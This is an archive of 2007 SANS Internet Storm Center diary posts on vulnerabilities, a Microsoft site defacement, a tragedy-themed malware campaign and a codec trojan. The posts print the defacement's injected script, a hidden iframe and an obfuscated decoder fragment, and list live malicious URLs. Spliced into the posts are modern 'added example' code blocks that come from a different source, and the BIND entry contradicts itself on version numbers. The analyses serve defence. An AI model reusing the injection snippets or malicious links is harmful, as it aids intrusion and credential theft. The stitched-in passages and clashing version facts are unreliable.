Published: 2007-04-30

Trillian Update

I know of a few friends that use Trillian.  This article is for you.  --Also, a big hello to the guys at Verisign, you know who you are--

The guys over at iDefense have discovered a vulnerability in Trillian, which is described as:

"Remote exploitation of multiple vulnerabilities in the Internet Relay Chat (IRC) module of Cerulean Studios' Trillian could allow for the interception of private conversations or execution of code as the currently logged on user.

When handling long CTCP PING messages containing UTF-8 characters, it is possible to cause the Trillian IRC client to return a malformed response to the server. This malformed response is truncated and is missing the terminating newline character. This could allow the next line sent to the server to be improperly sent to an attacker.

When a user highlights a URL in an IRC message window Trillian copies the data to an internal buffer. If the URL contains a long string of UTF-8 characters, it is possible to overflow a heap based buffer corrupting memory in a way that could allow for code execution.

A heap overflow can be triggered remotely when the Trillian IRC module receives a message that contains a font face HTML tag with the face attribute set to a long UTF-8 string." -- iDefense's website.

If you are running <=3.1 of Trillian, time to upgrade to

Joel Esler


Published: 2007-04-30

Bind Version 4.9.1 is out

Bind 4.9.1 is out, fixing a vulnerability in 4.9.0.

If you are running BIND 9.4.0, you should upgrade as soon as possible to BIND 4.9.1

BIND 4.9.1 can be downloaded from:

A binary installer for Windows is still being worked on.  It will be made available as soon as it's ready.

Happy updating!

Joel Esler


Published: 2007-04-30

Buffer Overflows In Adobe Products

Seems as if there is a Buffer Overflow in multiple Adobe products.  According to the exploit the following products are affected:

The PNG exploit affects:

- Photoshop CS2
- Photoshop CS3
- Photoshop Elements 5.0
- Corel Paint Shop Pro 11.20

And the Bitmap exploit affects:

- Photoshop CS2
- Photoshop CS3

The solution for these exploits, basically, is not to open untrusted .png, .bmp, .dib, or .rle files. The possibility of remote shells and command execution does exist, so be cautious. I am sure there will be more to come.

Joel Esler


Published: 2007-04-30

Verizon having network issues in the midwest

We've received a report from a reader letting us know that Verizon has had a fiber cut that is affecting most of the Northern Indiana area. The cut is reportedly isolated somewhere between Fort Wayne, Indiana and Chicago, IL.

The current estimate is 4-5 hours. 

Please do not be alarmed if your connectivity to sites is affected, this is why.  The Internet is not melting.  (Well, today at least)

Joel Esler


Published: 2007-04-29

Microsoft web site compromise and partner security

There’s been a lot of discussion over the last few hours regarding a Microsoft website that apparently got defaced. While the domain name has been taken offline, the defacement itself was rather obvious. Users browsing the page were shown a typical “0wn3d by” message with a picture taken of Bill Gates during what was probably his least pleasant visit to Belgium in 1998.

The affected site displayed a remotely hosted image and the attacker’s nickname:

<body onload="document.body.innerHTML='<p align=center><font size=7>Own3d by Cyber-Terrorist</font><img src=http://c2000.com/gifs!/billgates.jpg><p align=center><font size=7>--Cyb3rT--</font></p>';"><noscript>

The affected site was a subpage of ieak.microsoft.com where users could select a distribution license for the Internet Explorer Administration Kit. The server isn’t, however, located on the Microsoft network, but at a hosting partner. In addition, the source of the page mentions another third party as being responsible for the site’s development.

While the brand impact of a low-level compromise like this is negligible, it does bring up some hard questions. In this day and age of increasingly popular outsourcing and co-sourcing, how do you ensure your partners are able to meet your security requirements? Reputation is a good starting point, while supplier audits and compliance with relevant security standards can complete the picture. Both should be part of any outsourcing RFP.

After all, while this may be a small-time issue, web site defacements have in the recent past often involved malicious code distribution. Being unavailable and looking a bit silly reflects on a brand in one way; being involved in the distribution of a banking fraud trojan, quite another.

Maarten Van Horenbeeck


Published: 2007-04-29

NIST publishes guidance on RFID

Last Friday, the US National Institute of Standards and Technology (NIST) published guidance on how to securely use RFID technology. SP800-98 explains RFID technology, places it in context, reviews the risks involved with each of its uses and suggests mitigating controls.

It considers business process, business intelligence and privacy risk, in addition to 'external risks' such as those involved with electromagnetic radiation. The document, at 150 pages, is very detailed, and a timely release given the wide variety of potential uses for which RFID technology is now being considered.


Published: 2007-04-27

Lessons Learned from MS07-017

Wolfgang, a reader, submitted this link (http://blogs.msdn.com/sdl/archive/2007/04/26/lessons-learned-from-the-animated-cursor-security-bug.aspx) to an MSDN Blog article analyzing their lessons learned from the recent ANI Vulnerability. This reminded me that it’s almost time to perform a similar analysis on my own environment.

Lessons learned, or follow-up, is the last step in incident response. It also happens to be the most neglected step.

Hopefully, the MS07-017 patch has been safely deployed through most of your environment by now. I know not everyone has done so yet, and I feel your pain. For those who have, take a few moments to reflect on the event and recall how your environment performed in the early, pre-patch stages and how smoothly the transition to a post-patch state went.

  • Did you have compromises?
  • Did your AV detect the attacks with generic malicious-ANI or MS05-053 signatures?
  • Did your IDS detect the attacks with existing signatures?
  • Were you able to protect your unpatched users with content filtering?
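To make the AV/IDS questions above concrete, here is an added example (it is not from the diary, and it is not any vendor's signature): a small Node.js checker that walks the RIFF chunks of an .ani file and flags what the generic malicious-ANI signatures keyed on, an 'anih' chunk whose declared length is not the 36-byte ANIHEADER, or more than one 'anih' chunk in one file. That the bug class turns on the anih length is taken from the public analyses of the ANI vulnerabilities rather than from this page, and the function names and the two sample files are mine, constructed inline.

```javascript
// Added example, not from the diary and not a vendor signature: a minimal
// RIFF/ANI chunk walker plus the two checks that generic "malicious ANI"
// signatures keyed on (assumption drawn from public analyses of the ANI
// bugs): an 'anih' chunk whose declared length is not 36 bytes, and more
// than one 'anih' chunk in the file.

const ANIH_LEN = 36; // sizeof(ANIHEADER); assumed from the public format docs

// Walk RIFF chunks: 'RIFF' u32 size formType, then (id u32 size body) records,
// each body padded to an even length.
function parseRiffChunks(buf) {
  if (buf.length < 12 || buf.toString('ascii', 0, 4) !== 'RIFF') {
    throw new Error('not a RIFF file');
  }
  const form = buf.toString('ascii', 8, 12);
  const chunks = [];
  let off = 12;
  while (off + 8 <= buf.length) {
    const id = buf.toString('ascii', off, off + 4);
    const size = buf.readUInt32LE(off + 4);
    const truncated = off + 8 + size > buf.length;
    chunks.push({ id, size, offset: off, truncated });
    if (truncated) break;             // declared length runs off the end of the file
    off += 8 + size + (size & 1);     // word-alignment padding
  }
  return { form, chunks };
}

// Return a list of findings; an empty list means nothing a signature would fire on.
function checkAni(buf) {
  const findings = [];
  const { form, chunks } = parseRiffChunks(buf);
  if (form !== 'ACON') findings.push(`form type ${form} is not ACON`);
  const anih = chunks.filter(c => c.id === 'anih');
  if (anih.length === 0) findings.push('no anih chunk');
  if (anih.length > 1) findings.push(`multiple anih chunks (${anih.length})`);
  for (const c of anih) {
    if (c.size !== ANIH_LEN) findings.push(`anih length ${c.size} != ${ANIH_LEN} at offset ${c.offset}`);
  }
  for (const c of chunks) {
    if (c.truncated) findings.push(`chunk ${c.id} at offset ${c.offset} runs past end of file`);
  }
  return findings;
}

// Builders for the constructed samples below.
function chunk(id, body) {
  const hdr = Buffer.alloc(8);
  hdr.write(id, 0, 'ascii');
  hdr.writeUInt32LE(body.length, 4);
  return Buffer.concat([hdr, body, Buffer.alloc(body.length & 1)]);
}
function riff(form, ...parts) {
  const body = Buffer.concat([Buffer.from(form, 'ascii'), ...parts]);
  const hdr = Buffer.alloc(8);
  hdr.write('RIFF', 0, 'ascii');
  hdr.writeUInt32LE(body.length, 4);
  return Buffer.concat([hdr, body]);
}

// Constructed samples: a well-formed header, and one with a second,
// oversized anih chunk appended after the valid one.
const BENIGN_ANI = riff('ACON', chunk('anih', Buffer.alloc(ANIH_LEN)));
const SUSPECT_ANI = riff('ACON', chunk('anih', Buffer.alloc(ANIH_LEN)),
                         chunk('anih', Buffer.alloc(64, 0x41)));

console.log('benign :', checkAni(BENIGN_ANI));
console.log('suspect:', checkAni(SUSPECT_ANI));
```

A real cursor carries more chunks (LIST/INFO, the 'fram' list, 'rate', 'seq '), which the walker simply skips; a signature only cares about the anih length and count. A declared length that runs past the end of the buffer ends the walk and is reported as its own finding, since a truncated or oversized chunk is exactly the kind of input a parser should refuse rather than trust.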

Once you have gathered some of the data from the overall event, ask yourself:

  • “How could this have gone better?”
  • “Are there reasonable changes we could have made to the environment or policy to avoid impact?”
  • “Were the losses acceptable?”
Take these answers and develop a response plan.

At the day-job we needed to tighten the detection and analysis cycle for all of the new malware that was using this vector to get into our network. This means that I’ll probably have an easier time justifying that Sandnet (http://www.lurhq.com/truman/) we’ve been planning to build. We also need to look at the amount of time it takes to block malicious URLs in our response process. We also may want to consider a different content-filtering solution.


Published: 2007-04-26

The National Weather Service has issued...

As I sit here today looking at the black clouds swirling outside and praying my satellite connection doesn't drop, it sparked an interesting discussion amongst some of us handlers over all the bad weather and spring storms. Well, bad weather and storm damage can only lead you to one thought in the geek world, and you guessed it: your Disaster Recovery Plan! While not always a fun and exciting topic like malware or a good packet capture, it's really a critical part of our world, or a necessary evil, depending on how you want to look at it.

Let's not focus on your work DRP, but rather on your home one. Wait, everyone has one, right? Ok, no one throw anything, but yes, we all need one for home. If you don't believe me, just ask the folks in Texas/Mexico who got hammered by the latest tornado, or anyone who has suffered a natural disaster. For me, my work is mostly done from my home office, and that is becoming more common. Not to mention everything related to our personal lives is becoming automated as well. When was the last time you sat and manually wrote out anything that you wanted to keep? How lost would you be if your home computer(s) were destroyed right now and without warning? We all need to approach our preparedness at home in a similar fashion to our DRP at work.

Ask yourself where your backups for your computer are sitting, if you have them. If they are sitting next to your computer and your house gets destroyed, they won't help you much. Fellow handler Daniel Wesemann offered a good suggestion: the next time you head out to grandma and grandpa's, or maybe to a friend's or relative's house that is a couple of hours away, take a copy of your most recent backup and ask them to hang onto it for you.

Your backups, as well as critical personal documents, can be stored in a fireproof safe at your home for some extra protection as well. My sister and her husband actually do a really good job of this but take it a step farther. They live in a very tornado prone area of the US, so they keep all their original documents (birth certificates, marriage license, vehicle title, etc.) in a safety deposit box and only maintain certified copies of the originals at their house. They also maintain an electronic copy of the brand, model and serial numbers of high value items, as well as photos of all high value items. Don't limit yourself to electronic items; also consider photos of such things as antiques, paintings, etc. By doing it this way, they can back it up onto a CD and store the latest copy in the safety deposit box as well. They have everything documented for accounts, policies, etc. in case of an emergency.

Hopefully, no one ever has to use their home DRP, but if the worst happens, you'll be thankful that you had one. If you have anything that you do for your home DRP that you would like to share, then please drop us an email and we'll pass it along!


Published: 2007-04-24

Apple QuickTime Java Handling Unspecified Code Execution

Secunia Advisory: SA25011

Secunia has posted an advisory today that involves Apple QuickTime Java. According to the advisory, this is a highly critical problem that affects versions 3.x, 4.x, 5.x, 6.x and 7.x. The vulnerability is due to an unspecified error within the Java handling in QuickTime. This can be exploited to execute arbitrary code when a user visits a malicious web site using a Java-enabled browser, e.g. Safari or Firefox.

For more information see:



Published: 2007-04-24

Microsoft Office Exploit

On Monday, USA Today ran an article titled “Cyberspies exploit Microsoft Office”. The article states that the cyberspies have tainted Microsoft Office files and are emailing them to specific organizations in hopes that an unsuspecting employee will open the attachment and infect their computer, thus opening a hole which the attacker can then use to explore the infected network and look for trade secrets, military secrets, passwords, etc. MessageLabs, in an interview with USA Today, said that it has intercepted assaults coming from Taiwan and China since November 2006. It appears that the targets are Federal agencies and defense and nuclear contractors.

In a quote from the article, our own Alan Paller at the SANS Institute says:

“Assaults are coming from China and perhaps other countries in the hunt for military, trade and infrastructure intelligence, says Alan Paller, research director at The SANS Institute, a security think tank. The goal: strategic advantage over the USA. "The attacks are working," says Paller. "Penetrations are deep and broad."

For more information and to read the article:



Published: 2007-04-23

New Challenge: Microsoft Office Space - A SQL With Flair

Once again, I let Ed Skoudis talk me into writing a Skillz Challenge which is now posted over at EthicalHacker.net.  Unlike the pansy challenges that Ed doles out, this'n will really require some serious thinkin'... and it is written as a sequel to one of my all-time favorite movies: Office Space.  Drop on by, test your security thinkin' and see if you're up to the challenge...

By the way, did you get the memo detailing the requirement for adding cover sheets to your TPS reports?


Published: 2007-04-23

Follow the Bouncing Malware: Day of the Jackal

Otte Normalverbraucher leaned back in his chair, stretched and yawned. It was nearing midnight, and now that he stopped to think about it, he realized that he was going to be very tired when his alarm clock went off in the morning.

The real problem was that his typing skills just weren't very good. Oh sure, he could type... but he wasn't very fast, or for that matter, very accurate. It had taken him almost two hours to type out his reply to his cousin Joe in America, and even then, looking back over the message, it was filled with typing errors.

He chuckled silently to himself, reminded of an old joke: it didn't matter that he couldn't type very quickly... his cousin, Joe Sixpack, couldn't read very fast either.

Their trans-Atlantic correspondence had transitioned from the days of light-blue onionskin paper and envelopes marked “LUFTPOST/PAR AVION” into the electronic era somewhat seamlessly. He and Joe had been writing back and forth for almost twenty years now-- since both of them were in school. Joe's initial letter had arrived out of the blue-- a message from a cousin he didn't even know he had, living a different life, in a different country. They struck up a friendship and had continued to write back and forth over the years-- they seemed to have so many things in common: they each had a rather boring middle-management job, were married, had two children and were... well... both perfectly “average.” They had each gone out and purchased a computer a few years back as a family Christmas present, and had taken to communicating with each other by email. They had learned about this new technology together, swapping tips and tricks. Joe seemed to know so much about computers... he had explained in long, involved messages exactly how the Internet worked and somehow he managed to find the most amazing things out there on the 'net. He always sent Otte links to funny jokes, online games, and websites that had pictures guaranteed to make even the most worldly person blush. Otte had stored those emails away in a special folder, and even though it was late, he considered doing a little “recreational surfing” before turning in. He had heard that pornographic websites could infect your computer with some kind of virus or disease, but Joe had explained that it was all just a myth made up by left-wing feminists who wanted to keep men from looking at beautiful, naked women. Joe was always so “up” on popular culture and politics.

Otte clicked the “Send” button in his email program and imagined his message to Joe shooting through the long series of tubes that made up the Internet and appearing in Joe's in-box on the other side of the ocean. It was an amazing thing, and he always felt so “high-tech” when he sent email.

It was late, and as inviting as the thought of visiting one of Joe's “special” sites was, he decided that he should shut the machine down and head to bed. Just as he was about to turn the machine off, he heard a stupidly chipper voice announce, “Email für dich!”

Not only did Joe read slowly, but he also typed about as fast and as well as Otte, so it couldn't be a response so soon. Otte looked at his in-box and saw a new message:

Sender: Web-Nachrichten Deutschlands [info@focus.de]
Subject: In Muenchen ist Trauer angekuendigt
(“In Munich, mourning is announced”)

Otte was concerned. He clicked on the email and read the following:

Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http://tanknk.dothome.co.kr

(“Within an hour a Asian national committed 6 brutal murders and vanished in an unknown direction. The murderer sneaked into an apartment house and slaughtered all of the inhabitants including two small 10 year old girls, which went home. Slaughtered also were all pets. Police is shocked and now does all possible to find the culprit as soon as possible. Because of some passerby a short description of the culprit is available. There is an reward announced for hints to the case. Details and also a robot image under...”)

“What is the world coming to?” thought Otte as he re-read the message. Only last week he had read, in horror, the story of a mass killing in Virginia in the United States, and now this, right here in Germany. He had followed the details of the earlier story closely, and the parallels with this new tragedy were startling. He needed to know more, but before he clicked on the link, he wrote up a quick translation of the email and sent it off to his cousin... he just knew Joe would be as interested as he was.

Welcome to the Jungle

(OK... Once again, I find myself in the rather unenviable position of having to warn those of you whose brain waves fall a little short of the beach not to shoot yourselves in the foot. So... if you find that people are always questioning the number of angels that could dance on your head: DO NOT GO TO ANY OF THE SITES I MENTIONED IN THIS LITTLE MALWARE DECONSTRUCTION. JUST DON'T.)

Otte was going to be a bit disappointed... The link in that email wasn't going to take him to a story about a tragic mass murder in Munich, but instead to a rather uninteresting page in which free accounts at “dothome.co.kr” are described in Korean. But, buried deep within the page we find a little gift that someone placed within the HTML:

<iframe style='visibility: hidden;'width='1' height='1' src=''>

Note: They hid it waaaaaay off to the right by putting a whole mess of spaces in front of it, 'cause of course no one would ever look over there. You malware dudes crack me up... I can just see 'em... eight or nine guys all sitting around some big wooden table in their Secret Underground Malware Fortress of Doom:

Malware Dude #1: Okay... so we're agreed. We'll put the link to a hidden IFRAME within an otherwise innocuous page.

Malware Dude #2: But wait! What if someone looks at the source code to that page! Won't they be able to see the HTML code that creates the hidden IFRAME?

Malware Dude #1: Drat! Our entire plan is foiled! Curse that “View Page Source” menu item! Now we'll all have to go back to our previous careers, writing high performance Visual Basic apps!

A murmur of discontent courses through the room. There is talk of suicide. Someone mentions storming Redmond and demanding that the offending “View Page Source” option be removed from IE. Then, suddenly, in a shadowy back corner, a PFY stands up, clears his throat, and, in a squeaky voice, says:

Malware PFY: Perhaps we could put a whole bunch of SPACES in front of the IFRAME code. That way it would be pushed over to the right hand side and out of sight.

Malware Dude #1: Gasp! Why... why.... that is absolutely brilliant!

Malware Dude #2: Amazing! You sir, are a freakin' genius!

A chorus of cheers and shouts fills the room. High-fives are made. Toasts to the audacity of youth fill the air. A large container filled with Gatorade is inexplicably found sitting in another corner and is promptly dumped over the PFY's head.

And there is much rejoicing.

But, I digress...

The cleverly hidden IFRAME points to a webpage within a subdirectory on a different site that is driven by some PHP code. The PHP code is designed in such a way as to exclude anyone from the fun who visits the site with anything other than IE. You see, the PHP code checks the referrer field of every request coming in, and serves up fun and interesting malware to only those who browse with IE.

Since, of course, I couldn't visit the site with IE without risking possible infection, it was impossible for me to retrieve any of the code.


Sometimes I crack myself up.

After blatantly lying to PHP, we retrieve the following:

<script language=JavaScript>
function makemelaugh(x){
  var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;

(Note: I cleaned it up a whole lot, and edited it as indicated.)

Ok... Some things of interest here:

First off, someone is obviously trying to hide something from us here. The stuff that I edited at the second spot above (the parameter being passed to the makemelaugh() function) was actually several pages of gibberish. That gibberish will get turned back into code that actually does something by the makemelaugh() function.

The second thing I noticed is that although the text of the email is in German (well... sort of... my sources tell me it's pretty crappy German), the function name here is in English: makemelaugh(). Well, LaughingBoy... let's see what you're up to.

There are SO many ways that we could pull this sucker apart. Trust me... this thing is truly the JavaScript equivalent of shoving spaces in front of IFRAME references. It'll take all of about 30 seconds of editing to make this script tell us everything it knows. When are you malware writin' guys going to learn? Obfuscating code in an interpreted language hides about as much as Paris Hilton's underwear.

In any case, shoving some well placed <textarea></textarea> statements into this code and allowing IE to take a crack at it (on an instance of VMware... really, would you expect less?) we end up with an unobfuscated script that my AV tags as “VBS/TrojanDownloader.Small.DO”:

(Note: I tried including the script here in a draft of this piece, but it kept setting off AV alerts unless I edited it down to nothing... that's what happens when the kidz end up copying from each other... so you'll just have to make do with a description...)
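The textarea trick, done as an added example that is not the diary's script (that one stayed out for the reason just given): a constructed decoder in the style of makemelaugh(), using a toy rolling-XOR packing I made up, hands its output to eval(); the harness rewrites every eval( and document.write( call into a capture function and runs the script under Node, so the decoded stage is shown rather than executed. The names KEY0, STEP, buildSample and deobfuscate are mine, not the malware's.

```javascript
// Added example, not the script from the diary: the "print it instead of
// running it" trick, done in Node rather than with a <textarea> in IE.
// A constructed decoder in the style of makemelaugh() unpacks a payload and
// hands it to eval(); the harness rewrites every eval( / document.write(
// call into a capture function, so the decoded text is shown, not executed.

const KEY0 = 7;   // toy rolling-XOR key; constructed, nothing from the page
const STEP = 3;

// Encoder used only to build the sample (the packer's side of the toy).
function encodePayload(plain) {
  let k = KEY0, hex = '';
  for (const ch of plain) {
    hex += (ch.charCodeAt(0) ^ k).toString(16).padStart(2, '0');
    k = (k + STEP) % 256;
  }
  return hex;
}

// The obfuscated script as it would arrive in the browser: decoder + blob.
function buildSample(plainPayload) {
  return [
    'function makemelaugh(x){',
    '  var out="",k=' + KEY0 + ',i;',
    '  for(i=0;i<x.length;i+=2){',
    '    out+=String.fromCharCode(parseInt(x.slice(i,i+2),16)^k);',
    '    k=(k+' + STEP + ')%256;',
    '  }',
    '  eval(out);',
    '}',
    'makemelaugh("' + encodePayload(plainPayload) + '");',
  ].join('\n');
}

// Analyst side: textually swap the dangerous sinks for a capture function,
// give the script a minimal document stub, and let the interpreter unpack.
function deobfuscate(src) {
  const shown = [];
  const show = s => shown.push(String(s));
  const rewritten = src.replace(/\b(?:eval|document\.write(?:ln)?)\s*\(/g, '__show(');
  const docStub = { write: show, writeln: show, body: {} };
  new Function('__show', 'document', rewritten)(show, docStub);
  return shown;
}

// Stand-alone run: the decoded stage is printed, never executed.
const DEMO_OUTPUT = deobfuscate(buildSample("alert('stage two would run here')"));
console.log(DEMO_OUTPUT.join('\n'));
```

The rewrite is purely textual, which is exactly why it works on this class of script: the interpreter does all the unpacking and the analyst only changes where the result goes. If the captured text is itself another packed stage, feed it back through deobfuscate(); a script that reaches eval through an alias (window['eval'], Function) needs the stub extended rather than the regex.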

The downloaded script attempts to use the issue patched by Microsoft as MS06-014, “Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)”. It looks to me like the script might have been based off of exploit code published as part of the Metasploit framework (no shot at HD intended... that's just what it looks like...). In this case, the vulnerability does indeed allow for code execution, and the code that gets executed is downloaded from:

Again, this is another PHP script that won't give anything up to a non-IE browser. But, after doing a bit more creative lying, we're graced with a download of 102,400 bytes of packed Delphi dropper goodness called “update.exe.” When executed, this drops a file called ipv6monl.dll into the windows\system32 directory and installs it by setting it up to operate as our old friend, a Browser Helper Object (BHO). Update.exe also adds several entries under:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\load

which appear to hold some sort of configuration data. Also, in order to make sure that its nefarious communication will be allowed out of your machine, it diddles with some registry entries to make sure that IE has unfettered access through the Windows firewall. Oh... and if you happened to have turned off the use of BHOs in IE, it helpfully turns them back on. How nice...

What does LaughingBoy's BHO do? Well, from its vantage point deep inside the bowels of IE (boy... there's an icky metaphor), it captures various information about your computer and any user accounts, grabs any locally cached passwords as well as IE's autocomplete information and any passwords used by Outlook or Hotmail. Oh... and if you happen to use any one of several European banks, logging into your account on a compromised machine will result in your username and password being sent off to the bad guys.

Nice, really nice.

And let's not forget that this stellar example of human ingenuity started the whole sordid mess off by exploiting a recent tragedy.

How's this for a business model:

1) Wait for tragedy to strike
2) Send mail exploiting general fear and interest in said tragedy
3) Wait for easily duped people to click on your link

LaughingBoy: You have my vote for Scumbag of the Year. Me and 35 other Handlers would like to meet you (preferably in a dark alley) so we can present you with your “award”...

Oh... BTW, LaughingBoy... 'Leet h4xor d00dz don't use MidnightCommander... if you need to install mc when you 0wn a box, you pro'lly need to do a little remedial work on your 'nix command line foo...

Tom Liston - Handler on Duty

P.S.: Thanks to Josef for translating.  Note: The translation isn't poorly done.  Josef attempted to mimic the style of the original, poorly-written German.  Also, thanks to the inimitable Dr. J. for putting up with my German translation questions...


Published: 2007-04-23


You've just got to love the human jackals that slink out of their burrows every time tragedy strikes.  Recently, we've had pond-scum snapping up some Virginia Tech related domains for less-than-honorable purposes, and now we're getting reports of someone spamming messages across Europe containing a story of a VT-esque killing spree (complete with references to the crime being committed by an "Asian national").  The message also contains a link pointing to further information.  And (of course!) waiting on the other side of that link is a chunk of nasty malware (more on this later...).

How do you people live with yourselves?  How do you introduce yourselves to others? ("Hello, I make my living exploiting human tragedy.")  Are you proud of what you do?  At the end of the day, do you have some sense of accomplishment?  Do you tell your children what you do?  Your spouse?  Your parents? There are so many horrible, tragic things in this world already... how can it be that the best response that you can come up with in the face of suffering is to try to turn someone else's loss into your gain? 

Sometimes, I'm ashamed that I'm part of this species...


Published: 2007-04-22

Safari 0day? Looks like...

Greetings from CanSecWest! Ok, I am not there, but I have some friends that are actually there :). The interesting news that they sent from there is regarding a 0-day exploit for Apple's Safari web browser. According to one post about the hacking contest, a fully patched OSX machine was owned due to an exploitable flaw in Safari, triggered when visiting a malicious website. The bad thing is that there is not a single word in the latest Apple patch release about any Safari-related flaw. So, if you use Safari, stay tuned for more information!
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2007-04-22

Trojan posing as Codecs

One of our readers (Gary) has come across a forum posting with links to free porn movies:
http :// free-bdsm-movies. info/movies/1270174.avi
(Resolves to

However, clicking on the link will open another site in an iFrame:
http : //www. x-ratedclips.com/bdsm/dp/s5g2/movie1.php?bgcolor=000000&border=3C4553&id=1651
(Resolves to

The x-ratedclips.com page has HTML code that checks for the presence of a Trojan (Zlob.Trojan). If it is not found, it will display a page to tell the viewer that the movie cannot be played and to download a "missing Video ActiveX Object".

The "activex object" link is
http: // www. amultimediasource.com/download.php?id=1651
(Resolves to

Note: - is a known source of evil (http://isc.sans.org/diary.html?storyid=1811)

Not surprisingly, the downloaded file is actually a Trojan. Positive scan results from VirusTotal:

AntiVir 04.20.2007 DR/Zlob.Gen
AVG 04.20.2007 Downloader.Zlob.GG
BitDefender 7.2 04.21.2007 Trojan.Downloader.Zlob.RX
eSafe 04.19.2007 suspicious Trojan/Worm
Fortinet 04.21.2007 W32/Zlob.BRI!tr.dldr
Ikarus T3.1.1.5 04.20.2007 Trojan-Downloader.Win32.Zlob.bpg
Kaspersky 04.21.2007 Trojan-Downloader.Win32.Zlob.bqt
McAfee 5014 04.20.2007 New Malware.as
Sophos 4.16.0 04.20.2007 Troj/Zlob-Gen
TheHacker 04.15.2007 Trojan/Downloader.Zlob.bpl
Webwasher-Gateway 6.0.1 04.21.2007 Trojan.Zlob.Gen


Published: 2007-04-21

New MS KB article (deploy DNS remote RPC block workaround)

Microsoft has released a new Knowledge Base article describing how to disable the remote management over RPC functionality of a DNS server that is running Windows Server 2003 or Windows 2000 Server.

The KB article is located at

(Thanks to Juha-Matti for sharing too)


Published: 2007-04-20

port 443 / https increase

We do see a significant increase in port 443 scans. However, there is no "current" vulnerability that would explain it.

If you see attacks against https servers, please let us know and send in packets (including any web server logs if they would show an effect of the attack).

Try to limit packet submissions to "suspect" packets that either cause suspect server behaviour or trigger an IDS.



Published: 2007-04-20

IRA Tax Glitch

Some mutual fund companies, banks, and others that provide Individual Retirement Accounts (IRAs) in the United States are discovering that their computers might have made a mistake on Tuesday.  Normally, US taxes are due on April 15th, and you are allowed to make contributions to your IRA with credit to the previous year as long as the contribution arrives on or before "tax day".  This year, April 15th was on a Sunday so there is a normal extension to Monday, April 16th.  But this year was a bit unique.  April 16th is Emancipation Day in Washington DC, and is now celebrated as a holiday for the District of Columbia following legislation signed by the District's Mayor in January 2005.  The effect on taxes is that the new "tax day" becomes April 17th for everybody in the US.  Unfortunately not all computers (and many printed tax forms) were changed to reflect the new date.

So the issue with some banks and mutual fund companies is that customers using their web interfaces on Tuesday for IRA contributions were allowed to select 2006 as the year for which a deposit was credited. However, the back-end computers were programmed to only allow 2007 contributions after midnight the night before. So, if you made a 2006 contribution on Tuesday via a web portal or other online service, you should check to make sure that you were accurately credited for 2006 and that your contribution did not get recorded for 2007.

The next time this happens will be in April of 2012.  Let's see if the computers get the word.
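The date logic behind the glitch, as an added example in JavaScript (it is not code from any bank or fund company): the deadline is April 15 rolled forward over weekends and over the DC Emancipation Day observance, and the mismatch the entry describes is a front end that knows about the holiday talking to a back end that only rolls over the weekend. Two details here are my assumptions, not the page's: that Emancipation Day (April 16) is observed on the preceding Friday when it falls on a Saturday and the following Monday when it falls on a Sunday, and that it counts as a filing holiday from 2007 onward; the function names are mine as well.

```javascript
// Added example (not code from any bank or fund company): the deadline rule
// the entry describes, and the mismatch between a front end that knows about
// the DC holiday and a back end that only rolls over the weekend.
// Assumptions made here: Emancipation Day is April 16, observed on the
// preceding Friday when it falls on a Saturday and the following Monday when
// on a Sunday, and it is counted as a filing holiday from 2007 onward.

const DAY_MS = 86400000;
function utcDate(y, m, d) { return new Date(Date.UTC(y, m - 1, d)); }
function addDays(dt, n) { return new Date(dt.getTime() + n * DAY_MS); }
function iso(dt) { return dt.toISOString().slice(0, 10); }
function isWeekend(dt) { const w = dt.getUTCDay(); return w === 0 || w === 6; }

function emancipationDayObserved(year) {
  const d = utcDate(year, 4, 16);
  if (d.getUTCDay() === 6) return addDays(d, -1); // Saturday -> observed Friday
  if (d.getUTCDay() === 0) return addDays(d, 1);  // Sunday -> observed Monday
  return d;
}

// April 15 rolled forward over weekends and (optionally) the DC holiday.
function filingDeadline(year, { honorDcHoliday = true } = {}) {
  const holidays = new Set();
  if (honorDcHoliday && year >= 2007) holidays.add(iso(emancipationDayObserved(year)));
  let d = utcDate(year, 4, 15);
  while (isWeekend(d) || holidays.has(iso(d))) d = addDays(d, 1);
  return iso(d);
}

// Which tax year a contribution submitted on `submittedIso` (YYYY-MM-DD)
// should be credited to: the prior year up to and including the deadline.
function creditedTaxYear(submittedIso, opts) {
  const year = Number(submittedIso.slice(0, 4));
  return submittedIso <= filingDeadline(year, opts) ? year - 1 : year;
}

// Reproduce Tuesday's mismatch: the portal and the back end disagree.
function portalVsBackend(submittedIso) {
  return {
    portal: creditedTaxYear(submittedIso),                             // honors the holiday
    backend: creditedTaxYear(submittedIso, { honorDcHoliday: false }), // weekend roll only
  };
}

console.log('2007 deadline:', filingDeadline(2007), ' 2012 deadline:', filingDeadline(2012));
console.log('2007-04-17:', portalVsBackend('2007-04-17'));
```

The point of keeping the holiday rule in one function is that both tiers call the same code; the glitch is what happens when the rule lives in two places (a web form and a batch job) and only one of them is updated.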

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-04-19

Malware Soup du Jour

As an avid reader of this diary, you know of course that things are not always what they appear to be. As was the case with a user today who, after hitting a convoluted set of exploit files, ended up with his browser trying to download files from us6-redhat520-com. No, this isn't RedHat Inc. And no, the HTMs coming from there are not HTMs but EXEs in disguise. In the meantime, the more nimble of the AV vendors have even come up with names for the critter: Backdoor.Generic.U (McAfee) and Troj_Agent.PUE (Trend). The hoster of the site has been informed; the owner of the domain and site seems to be located in China.

In other cases, though, things sometimes are what they appear to be. While today investigating a malware sample coming from, I noticed that in the past month we had analyzed almost a dozen samples coming from the same address range. Good enough an indication for me that putting this address range "off limits" for my systems is time well invested. The address range is located in Moscow, Russia, so unless your users are located there or do a lot of business with Moscow, chances are small that blocking the entire address range will have side effects.


Published: 2007-04-19

Apple Security Announcement 2007-004

